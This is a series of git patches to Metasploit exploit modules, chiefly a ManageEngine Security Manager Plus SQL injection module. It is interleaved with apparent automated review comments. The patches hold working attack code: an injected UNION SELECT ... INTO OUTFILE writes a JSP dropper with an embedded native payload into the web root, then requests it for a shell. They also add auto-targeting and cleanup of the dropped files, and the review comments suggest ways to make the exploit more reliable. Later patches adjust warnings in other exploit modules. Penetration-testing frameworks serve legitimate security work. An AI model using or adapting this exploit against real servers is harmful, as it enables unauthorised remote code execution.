@@ -68,16 +68,26 @@ class Metasploit3 < Msf::Exploit::Remote # We cannot delete the executable because it will still be in use. # def on_new_session(cli) - if cli.type != 'meterpreter' - print_warning("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}") - return + if target['Platform'] == 'linux' + print_warning("Malicious executable is removed during payload execution") end - cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") + if cli.type == 'meterpreter' + cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") + end begin + path = "../webapps/SecurityManager/#{@jsp_name + '.jsp'}" print_warning("#{rhost}:#{rport} - Deleting: #{@jsp_name + '.jsp'}") - cli.fs.file.rm("../webapps/SecurityManager/#{@jsp_name + '.jsp'}") + + if cli.type == 'meterpreter' + cli.fs.file.rm(path) + else + del_cmd = (target['Platform'] == 'linux') ? 'rm' : 'del' + path = path.gsub(/\//, '\\') if target['Platform'] == 'win' + cli.shell_command_token("#{del_cmd} \"#{path}\"") + end + print_good("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") rescue ::Exception => e print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}") @@ -107,8 +117,15 @@ class Metasploit3 < Msf::Exploit::Remote Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path}); Thread.sleep(200); | + + var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3) + cleanup = %Q| + Thread.sleep(200); + Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path}); + | else - chmod = '' + chmod = '' + cleanup = '' end jsp = %Q| @@ -132,6 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote #{var_ostream}.close(); #{chmod} Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); + #{cleanup} } catch (Exception e) { } %> From 90542547c6d590352e69818648a8e0ccb95b11eb Mon Sep 17 00:00:00 2001 
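Review bot: on_new_session only mentions the dropped executable when the target is Linux; on Windows the `createTempFile(...)`-generated `<name>*.exe` in the Tomcat temp directory is neither removed nor named, so the operator has nothing to clean up by. Keep the random name from generate_jsp_payload in an instance variable (`@native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3)`) and add `print_warning("#{rhost}:#{rport} - Please remove #{@native_payload_name}*.exe from the temp directory manually")` in an `else` branch of the platform check. The `rm` cleanup appended to the JSP for Linux is fine since `exec` has already started the process, but the `Thread.sleep(200)` before it is an arbitrary delay with no feedback if the exec itself failed.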
From: sinn3r Date: Tue, 23 Oct 2012 19:07:13 -0500 Subject: [PATCH 42/74] Add auto-target, and some changes to cleanup --- .../multi/http/manageengine_search_sqli.rb | 128 ++++++++++++------ 1 file changed, 89 insertions(+), 39 deletions(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index 066b8f5371..6e3106070d 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -34,11 +34,14 @@ class Metasploit3 < Msf::Exploit::Remote ['EDB','22094'], ['BID', '56138'] ], + 'Platform' => ['win', 'linux'], 'Targets' => [ - ['Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win' }], - ['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }] + ['Automatic', {}], + ['Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win' }], + ['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }] ], + 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => "Oct 18 2012")) 
@@ -63,9 +66,39 @@ class Metasploit3 < Msf::Exploit::Remote end + def pick_target + return target if target.name != 'Automatic' + + rnd_num = Rex::Text.rand_text_numeric(1) + rnd_fname = Rex::Text.rand_text_alpha(5) + ".txt" + outpath = "../../webapps/SecurityManager/#{rnd_fname}" + + @clean_ups << outpath + + sqli = "#{rnd_num})) union select @@version," + sqli << (2..28).map {|e| e} * "," + sqli << " into outfile \"#{outpath}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}" + sqli_exec(sqli) + + res = send_request_raw({'uri'=>"/#{rnd_fname}"}) + + # Linux = 5.0.36-enterprise + # Windows = 5.0.36-enterprise-nt + + if res and res.body =~ /\d\.\d\.\d\d\-enterprise\-nt/ + print_status("#{rhost}:#{rport} - Target selected: #{targets[1].name}") + return targets[1] # Windows target + elsif res and res.body =~ /\d\.\d\.\d\d\-enterprise/ + print_status("#{rhost}:#{rport} - Target selected: #{targets[2].name}") + return targets[2] + end + + return nil + end + + # - # Remove the JSP once we get a shell. - # We cannot delete the executable because it will still be in use. + # We're in SecurityManager/bin at this point # def on_new_session(cli) if target['Platform'] == 'linux' 
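Review bot: The version regexes in pick_target hard-code the digit counts (`/\d\.\d\.\d\d\-enterprise\-nt/`), so any bundled MySQL build other than a 5.0.3x-style string falls through to `return nil` even though the injection worked; `/\d+\.\d+\.\d+-enterprise-nt/` and `/\d+\.\d+\.\d+-enterprise/` match the same outputs without that assumption. The result of `sqli_exec(sqli)` is also discarded and a nil `res` is indistinguishable from an unrecognised version, so it is worth a `vprint_status` of `res.body` (or of "no response") before returning nil to make a failed auto-target diagnosable. Note that the probe `.txt` is only ever removed by on_new_session, so a nil return here leaves it in the web root; on_new_session's body continues past the end of the hunk.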
@@ -77,20 +110,23 @@ class Metasploit3 < Msf::Exploit::Remote end begin - path = "../webapps/SecurityManager/#{@jsp_name + '.jsp'}" - print_warning("#{rhost}:#{rport} - Deleting: #{@jsp_name + '.jsp'}") + @clean_ups.each { |f| + base = File.basename(f) + f = "../webapps/SecurityManager/#{base}" + print_warning("#{rhost}:#{rport} - Deleting: \"#{base}\"") - if cli.type == 'meterpreter' - cli.fs.file.rm(path) - else - del_cmd = (target['Platform'] == 'linux') ? 'rm' : 'del' - path = path.gsub(/\//, '\\') if target['Platform'] == 'win' - cli.shell_command_token("#{del_cmd} \"#{path}\"") - end + if cli.type == 'meterpreter' + cli.fs.file.rm(f) + else + del_cmd = (@my_target['Platform'] == 'linux') ? 'rm' : 'del' + f = f.gsub(/\//, '\\') if @my_target['Platform'] == 'win' + cli.shell_command_token("#{del_cmd} \"#{f}\"") + end - print_good("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") + print_good("#{rhost}:#{rport} - \"#{base}\" deleted") + } rescue ::Exception => e - print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}") + print_error("Unable to delete: #{e.message}") end end @@ -99,9 +135,10 @@ class Metasploit3 < Msf::Exploit::Remote # Embeds our executable in JSP # def generate_jsp_payload - native_payload = Rex::Text.encode_base64(generate_payload_exe) + opts = {:arch => @my_target.arch, :platform => @my_target.platform} + native_payload = Rex::Text.encode_base64(generate_payload_exe(opts)) native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3) - ext = (target['Platform'] == 'win') ? '.exe' : '.bin' + ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin' var_raw = Rex::Text.rand_text_alpha(rand(8) + 3) var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3) 
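Review bot: The delete branch in this hunk switches to `@my_target['Platform']`, but the Linux warning a few lines above it in on_new_session (visible as context at the end of the previous hunk) still tests `target['Platform']`, which is nil when the new default `Automatic` target is selected, so that warning never fires in the default configuration; change it to `if @my_target['Platform'] == 'linux'`. The same inconsistency should be checked anywhere else `target[...]` survives, since `@my_target` is now the only reliable source of platform after pick_target. on_new_session starts before this hunk.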
@@ -111,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote var_path = Rex::Text.rand_text_alpha(rand(8) + 3) var_proc2 = Rex::Text.rand_text_alpha(rand(8) + 3) - if target['Platform'] == 'linux' + if @my_target['Platform'] == 'linux' var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3) chmod = %Q| Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path}); @@ -161,14 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote jsp.unpack("H*")[0] end - - # - # Run the actual exploit - # - def inject_exec - # Inject our JSP payload - hex_jsp = generate_jsp_payload - + def sqli_exec(sqli_string) cookie = 'STATE_COOKIE=&' cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&' cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&' @@ -180,14 +210,9 @@ class Metasploit3 < Msf::Exploit::Remote cookie << '2RequestsshowThreadedReq=showThreadedReqshow; ' cookie << '2RequestshideThreadedReq=hideThreadedReqhide;' - rnd_num = Rex::Text.rand_text_numeric(1) - sqli = "#{rnd_num})) union select 0x#{hex_jsp}," - sqli << (2..28).map {|e| e} * "," - sqli << " into outfile #{@outpath} FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}" - state_id = Rex::Text.rand_text_numeric(5) - print_status("#{rhost}:#{rport} - Sending JSP payload") - res = send_request_cgi({ + + send_request_cgi({ 'method' => 'POST', 'uri' => "/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp", 'headers' => { 
@@ -202,13 +227,28 @@ class Metasploit3 < Msf::Exploit::Remote 'ANDOR' => 'and', 'condition_1' => 'OpenPorts@PORT', 'operator_1' => 'IN', - 'value_1' => sqli, + 'value_1' => sqli_string, 'COUNT' => '1' } }) + end - print_status("#{rhost}:#{rport} - Sending /#{@jsp_name + '.jsp'}") - send_request_raw({'uri' => "/#{@jsp_name + '.jsp'}"}) + # + # Run the actual exploit + # + def inject_exec(out) + hex_jsp = generate_jsp_payload + rnd_num = Rex::Text.rand_text_numeric(1) + sqli = "#{rnd_num})) union select 0x#{hex_jsp}," + sqli << (2..28).map {|e| e} * "," + sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}" + + print_status("#{rhost}:#{rport} - Sending JSP payload") + sqli_exec(sqli) + + fname = "/#{File.basename(out)}" + print_status("#{rhost}:#{rport} - Requesting #{fname}") + res = send_request_raw({'uri' => fname}) handler end @@ -218,9 +258,19 @@ class Metasploit3 < Msf::Exploit::Remote # The server must start first, and then we send the malicious requests # def exploit - @jsp_name = rand_text_alpha(rand(6)+3) - @outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\"" + @clean_ups = [] - inject_exec + @my_target = pick_target + if @my_target.nil? + print_error("#{rhost}:#{rport} - Unable to select a target, we must bail.") + return + end + + jsp_name = rand_text_alpha(rand(6)+3) + outpath = "../../webapps/SecurityManager/#{jsp_name + '.jsp'}" + + @clean_ups << outpath + + inject_exec(outpath) end end \ No newline at end of file From 8c5a73bb7f17133ca54987f3e438c2970c7aced2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 19:34:12 -0500 Subject: [PATCH 43/74] Change exception handling --- .../multi/http/manageengine_search_sqli.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index 6e3106070d..6e79783ad2 100644 
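Review bot: inject_exec never inspects the response to `send_request_raw({'uri' => fname})`, so a JSP that failed to compile (a 500 from Tomcat) or was never written by `INTO OUTFILE` (a 404) looks exactly like a slow callback; `res` is assigned and then ignored. Log the outcome before calling `handler`: `print_error("#{rhost}:#{rport} - Unexpected response #{res.code}") if res and res.code != 200`, and treat a nil `res` as a connection failure. MySQL's `INTO OUTFILE` also refuses to overwrite an existing file, so a verbose message when the JSP request 404s would point straight at that case.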
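Review bot: When pick_target returns nil, exploit prints an error and returns normally, so the run is reported as completed rather than failed; use `fail_with(Exploit::Failure::NoTarget, "Unable to select a target")` so the framework records the failure. In that path the probe `.txt` that pick_target appended to `@clean_ups` is also left in the web root, because cleanup only runs from on_new_session; either attempt a best-effort delete through a second `INTO OUTFILE` is impossible, so at least `print_warning` the file name so the operator can remove it.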
--- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -109,12 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") end - begin - @clean_ups.each { |f| - base = File.basename(f) - f = "../webapps/SecurityManager/#{base}" - print_warning("#{rhost}:#{rport} - Deleting: \"#{base}\"") + @clean_ups.each { |f| + base = File.basename(f) + f = "../webapps/SecurityManager/#{base}" + print_warning("#{rhost}:#{rport} - Deleting: \"#{base}\"") + begin if cli.type == 'meterpreter' cli.fs.file.rm(f) else @@ -124,10 +124,10 @@ class Metasploit3 < Msf::Exploit::Remote end print_good("#{rhost}:#{rport} - \"#{base}\" deleted") - } - rescue ::Exception => e - print_error("Unable to delete: #{e.message}") - end + rescue ::Exception => e + print_error("Unable to delete: #{e.message}") + end + } end From f9bb910c3bd4e7d962ea1c8b61fa6913cd75451c Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 19:42:36 -0500 Subject: [PATCH 44/74] Make the check() try SQLI --- .../exploits/multi/http/manageengine_search_sqli.rb | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index 6e79783ad2..c660de1ea4 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -52,14 +52,11 @@ class Metasploit3 < Msf::Exploit::Remote end - # - # A very gentle check to see if Security Manager Plus exists or not - # def check - res = send_request_raw({'uri' => '/SecurityManager.cc'}) + res = sqli_exec(Rex::Text.rand_text_alpha(1)) - if res and res.body =~ /\SecurityManager Plus\<\/title\>/ - return Exploit::CheckCode::Detected + if res and res.body =~ /Error during search/ + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end 
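Review bot: Moving the `begin`/`rescue` inside the `@clean_ups.each` loop correctly lets one failed delete continue to the next, but the rescue is still `rescue ::Exception => e`, which also swallows `Interrupt` and `SystemExit` while the operator is trying to abort the cleanup; `rescue ::StandardError => e` (or the bare `rescue => e`) is the Ruby idiom and catches every error the delete can raise. The loop also silently treats a successful `shell_command_token` as a deletion, since the command's output is not checked; a `vprint_status` of the returned output would show a `del`/`rm` error. on_new_session starts before this hunk.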
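Review bot: The new check reports `CheckCode::Safe` whenever `res` is nil, so a timeout or refused connection is returned as "not vulnerable"; return `Exploit::CheckCode::Unknown` when there is no response and reserve `Safe` for a response that lacks the error string. Matching on `/Error during search/` is also a fragile fingerprint: a localised or customised error page makes a vulnerable host look safe, so consider combining it with the `SecurityManager Plus` title check the old check performed. The injected value is a single random letter, which is fine as an error trigger but would be clearer with a comment saying the non-numeric value is expected to break the query.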
@@ -82,6 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri'=>"/#{rnd_fname}"}) + # What @@version returns: # Linux = 5.0.36-enterprise # Windows = 5.0.36-enterprise-nt @@ -248,7 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote fname = "/#{File.basename(out)}" print_status("#{rhost}:#{rport} - Requesting #{fname}") - res = send_request_raw({'uri' => fname}) + send_request_raw({'uri' => fname}) handler end From 8eb790f62c38f4cf05be25f9b9be8a60a8ce40d2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 19:46:09 -0500 Subject: [PATCH 45/74] Final touchup --- modules/exploits/multi/http/manageengine_search_sqli.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index c660de1ea4..8b27eb6f73 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -241,7 +241,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli << (2..28).map {|e| e} * "," sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}" - print_status("#{rhost}:#{rport} - Sending JSP payload") + print_status("#{rhost}:#{rport} - Trying SQL injection...") sqli_exec(sqli) fname = "/#{File.basename(out)}" @@ -252,10 +252,8 @@ class Metasploit3 < Msf::Exploit::Remote end - # - # The server must start first, and then we send the malicious requests - # def exploit + # This is used to collect files we want to delete later @clean_ups = [] @my_target = pick_target From f1423bf0b4fbb026ea44c2f41bcd4b4262a90071 Mon Sep 17 00:00:00 2001 
From: sinn3r Date: Wed, 24 Oct 2012 00:44:53 -0500 Subject: [PATCH 46/74] If a message is clearly a warning, then use print_warning --- modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb | 4 ++-- modules/auxiliary/spoof/dns/bailiwicked_domain.rb | 2 +- modules/auxiliary/spoof/dns/bailiwicked_host.rb | 2 +- modules/exploits/multi/http/jboss_bshdeployer.rb | 6 +++--- .../exploits/multi/http/jboss_deploymentfilerepository.rb | 4 ++-- modules/exploits/multi/http/jboss_maindeployer.rb | 8 ++++---- modules/exploits/multi/http/openfire_auth_bypass.rb | 2 +- modules/exploits/multi/http/tomcat_mgr_deploy.rb | 6 +++--- modules/exploits/solaris/sunrpc/ypupdated_exec.rb | 2 +- modules/exploits/unix/webapp/openx_banner_edit.rb | 4 ++-- modules/exploits/unix/webapp/twiki_history.rb | 4 ++-- modules/exploits/unix/webapp/twiki_search.rb | 4 ++-- .../exploits/windows/fileformat/adobe_pdf_embedded_exe.rb | 2 +- modules/exploits/windows/iis/iis_webdav_upload_asp.rb | 6 +++--- modules/exploits/windows/local/current_user_psexec.rb | 4 ++-- modules/exploits/windows/ssl/ms04_011_pct.rb | 2 +- modules/exploits/windows/wins/ms04_045_wins.rb | 2 +- 17 files changed, 32 insertions(+), 32 deletions(-) diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb index 28f0f916b1..9b25f90db8 100644 --- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb +++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb @@ -135,8 +135,8 @@ class Metasploit3 < Msf::Auxiliary sunrpc_destroy rescue ::Rex::Proto::SunRPC::RPCTimeout - print_status 'Warning: ' + $! - print_status 'Exploit may or may not have succeeded.' + print_warning 'Warning: ' + $! + print_warning 'Exploit may or may not have succeeded.' end diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index 1c402a3b23..e5a842abde 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb 
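Review bot: `print_warning 'Warning: ' + $!` in the solaris_kcms_readfile rescue concatenates a String with the exception object in `$!`, which raises `TypeError` inside the rescue clause and masks the original `RPCTimeout`; the commit changed the printer but kept the expression. Use interpolation, `print_warning "Warning: #{$!}"` (or `$!.message`), which works for any exception. The rescue belongs to a `begin` block that starts before this hunk.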
+++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Auxiliary end if(reps < 30) - print_status("WARNING: This server did not reply to all of our requests") + print_warning("WARNING: This server did not reply to all of our requests") end if(random) diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index 441ab15a8e..df60299919 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -134,7 +134,7 @@ class Metasploit3 < Msf::Auxiliary end if(reps < 30) - print_status("WARNING: This server did not reply to all of our requests") + print_warning("WARNING: This server did not reply to all of our requests") end if(random) diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index 756545bb9b..54a8b89c64 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -222,10 +222,10 @@ EOT print_status("Undeploying #{uri} by deleting the WAR file via BSHDeployer...") res = invoke_bshscript(delete_script, @pkg) if !res - print_error("WARNING: Unable to remove WAR [No Response]") + print_warning("WARNING: Unable to remove WAR [No Response]") end if (res.code < 200 || res.code >= 300) - print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]") + print_warning("WARNING: Unable to remove WAR [#{res.code} #{res.message}]") end handler 
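Review bot: In the jboss_bshdeployer undeploy hunk the `if !res` branch only prints a warning and falls through to `if (res.code < 200 || res.code >= 300)`, so a missing response raises `NoMethodError` on `nil` right after the warning is printed. Make the second test conditional on a response: `elsif (res.code < 200 || res.code >= 300)` in place of the separate `if`, so both branches end before `handler` is called. The enclosing method starts before this hunk.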
@@ -307,7 +307,7 @@ EOT if (res.code < 200 || res.code >= 300) case res.code when 401 - print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") + print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") fail_with(Exploit::Failure::NoAccess, "Authentication requested: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") end diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 5b961d55ad..09da6021f2 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -248,9 +248,9 @@ EOT delete_res << delete_file('./', Rex::Text.uri_encode(app_base) + '.war', '') delete_res.each do |res| if !res - print_error("WARNING: Unable to remove WAR [No Response]") + print_warning("WARNING: Unable to remove WAR [No Response]") elsif (res.code < 200 || res.code >= 300) - print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]") + print_warning("WARNING: Unable to remove WAR [#{res.code} #{res.message}]") end end diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index be7cb66e1c..da2cc34909 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb 
@@ -211,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote if (res.code < 200 or res.code >= 300) case res.code when 401 - print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") + print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") end fail_with(Exploit::Failure::Unknown, "Upload to deploy WAR archive [#{res.code} #{res.message}]") end @@ -291,12 +291,12 @@ class Metasploit3 < Msf::Exploit::Remote } }, 30) if (! res) - print_error("WARNING: Undeployment failed on #{app_base} [No Response]") + print_warning("WARNING: Undeployment failed on #{app_base} [No Response]") elsif (res.code == 500 and datastore['VERB'] == 'POST') # POST requests result in a http 500 error, but the payload is removed..." - print_status("WARNING: Undeployment might have failed (unlikely)") + print_warning("WARNING: Undeployment might have failed (unlikely)") elsif (res.code < 200 or res.code >= 300) - print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]") + print_warning("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]") end handler diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index 53b143be56..d1f8ad56b1 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -195,7 +195,7 @@ class Metasploit3 < Msf::Exploit::Remote }) - print_error("Warning: got no response from the upload, continuing...") if !res + print_warning("Warning: got no response from the upload, continuing...") if !res # Delete the uploaded JAR file if datastore['REMOVE_PLUGIN'] diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 0b5ccdebbf..1632d1aea5 100644 
--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -217,7 +217,7 @@ class Metasploit3 < Msf::Exploit::Remote if (res.code < 200 or res.code >= 300) case res.code when 401 - print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") + print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") end fail_with(Exploit::Failure::Unknown, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]") end @@ -259,9 +259,9 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET' }, 20) if (! res) - print_error("WARNING: Undeployment failed on #{path} [No Response]") + print_warning("WARNING: Undeployment failed on #{path} [No Response]") elsif (res.code < 200 or res.code >= 300) - print_error("Deletion failed on #{path} [#{res.code} #{res.message}]") + print_warning("Deletion failed on #{path} [#{res.code} #{res.message}]") end handler diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb index 3fbcc4f888..b72909e874 100644 --- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb +++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status('No Errors, appears to have succeeded!') rescue ::Rex::Proto::SunRPC::RPCTimeout - print_error('Warning: ' + $!) + print_warning('Warning: ' + $!) end end diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index 7b4554ba48..445a8fcbe6 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb 
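Review bot: `print_warning('Warning: ' + $!)` in the ypupdated_exec hunk concatenates a String with the exception object held in `$!`, which raises TypeError inside the rescue clause (unless that exception class defines `to_str`) and replaces the timeout message with a crash; the removed line had the same problem, so the commit only carried it over. Interpolation converts it: `print_warning("Warning: #{$!}")`, or bind it with `rescue ::Rex::Proto::SunRPC::RPCTimeout => e` and print `e.message`. The enclosing method starts outside the hunk.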
@@ -157,9 +157,9 @@ class Metasploit3 < Msf::Exploit::Remote # Delete the banner :) if (not openx_banner_delete(uri_base, cookie, adv_id, camp_id, ban_id)) - print_error("WARNING: Unable to automatically delete the banner :-/") + print_warning("WARNING: Unable to automatically delete the banner :-/") else - print_status("Successfully deleted banner # #{ban_id}") + print_good("Successfully deleted banner # #{ban_id}") end print_status("You should have a session now.") diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index 60992ffeb8..6f57d9c253 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => test_url }, 25) if (not res) or (res.code != 404) - print_error("WARNING: The test file exists already!") + print_warning("WARNING: The test file exists already!") return Exploit::CheckCode::Safe end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => cmd_base + Rex::Text.uri_encode(rev) }, 25) if (not res) or (res.code != 200) - print_error("WARNING: unable to remove test file (#{test_file})") + print_warning("WARNING: unable to remove test file (#{test_file})") end return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index 8d53310d6c..076195f93b 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => test_url }, 25) if (not res) or (res.body.match(content)) - print_error("WARNING: The test file exists already!") + print_warning("WARNING: The test file exists already!") return Exploit::CheckCode::Safe end 
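Review bot: In the twiki_history check hunk the condition `(not res) or (res.code != 404)` treats a missing response the same as an existing test file, so on a timeout the new `print_warning("WARNING: The test file exists already!")` is misleading and the check returns `Exploit::CheckCode::Safe` for a host that simply did not answer. Splitting the nil case out, `return Exploit::CheckCode::Unknown unless res` before the 404 test, keeps the warning accurate. The twiki_search check hunk on the same line has the same shape with `res.body.match(content)`.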
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => cmd_base + Rex::Text.uri_encode(search) }, 25) if (not res) or (res.code != 200) - print_error("WARNING: unable to remove test file (#{test_file})") + print_warning("WARNING: unable to remove test file (#{test_file})") end return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index 97b17790ef..a9fecc52a8 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote lines = [] launch_message.gsub(/.{1,80}(?:\s|\Z)/) { lines << $& } if (lines.length > 2) - print_status("Warning: the LAUNCH_MESSAGE is more than 2 lines. It may not display correctly.") + print_warning("Warning: the LAUNCH_MESSAGE is more than 2 lines. It may not display correctly.") end output << "&"+ diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index c04418b1e8..187f81b3a0 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Upload failed on #{path_tmp} [#{res.code} #{res.message}]") case res.code when 401 - print_status("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") + print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") end return end 
